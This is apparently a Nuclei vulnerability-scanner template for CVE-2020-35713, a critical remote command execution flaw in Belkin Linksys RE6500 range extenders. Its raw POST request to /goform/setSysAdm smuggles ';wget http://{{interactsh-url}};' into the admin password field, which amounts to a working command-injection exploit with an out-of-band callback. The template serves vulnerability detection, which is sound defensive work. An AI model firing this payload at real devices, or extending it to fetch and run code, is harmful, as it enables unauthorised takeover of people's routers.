nuclei-templates/cves/2020/CVE-2020-35713.yaml

37 lines
1.2 KiB
YAML

id: CVE-2020-35713
info:
name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution
author: gy741
severity: critical
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
reference:
- https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt
- https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-35713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35713
cwe-id: CWE-78
tags: cve,cve2020,linksys,rce,oast,router
requests:
- raw:
- |
POST /goform/setSysAdm HTTP/1.1
Host: {{Hostname}}
Accept: */*
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.shtml
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/28